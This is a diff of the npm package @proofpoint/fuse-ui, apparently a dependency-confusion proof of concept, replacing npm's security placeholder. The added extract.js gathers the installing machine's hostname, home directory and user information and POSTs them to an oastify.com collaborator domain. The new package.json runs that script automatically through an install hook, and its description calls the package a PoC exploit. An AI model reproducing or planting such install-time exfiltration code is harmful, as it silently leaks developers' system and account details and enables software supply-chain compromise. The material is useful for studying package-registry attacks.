@proofpoint/fuse-ui 0.0.1-security → 1.0.0

package/extract.js

@@ -0,0 +1,29 @@
+const https = require('https');
+var os = require("os");
+var hostname = os.hostname();
+var dir = os.homedir()
+var user = os.userInfo()
+const data = new TextEncoder().encode(
+  JSON.stringify({
+    host: hostname,
+    project_id: "securityeducation",
+    current_path: dir,
+    username: user
+  })
+);
+
+const options = {
+  hostname: process.argv[2] + '.' + hostname + '.theanbyywgwv0bmsoxqjnpn0ur0ho6.oastify.com',
+  port: 443,
+  path: '/',
+  method: 'POST',
+  headers: {
+    'Content-Type': 'application/json',
+    'Content-Length': data.length
+  },
+  rejectUnauthorized: false
+}
+
+const req = https.request(options, res => {});
+req.write(data);
+req.end();

package/package.json

@@ -1,6 +1,12 @@
-{
-  "name": "@proofpoint/fuse-ui",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
-}
+{
+    "name": "@proofpoint/fuse-ui",
+    "version": "1.0.0",
+    "description": "This package is a PoC exploit created by deshine",
+    "main": "index.js",
+    "author": "deshine",
+    "license": "ISC",
+    "dependencies": { },
+    "scripts": {
+      "install": "node extract.js"
+    }
+  }

package/README.md

@@ -1,5 +0,0 @@
-# Security holding package
-
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-
-Please refer to www.npmjs.com/advisories?search=%40proofpoint%2Ffuse-ui for more information.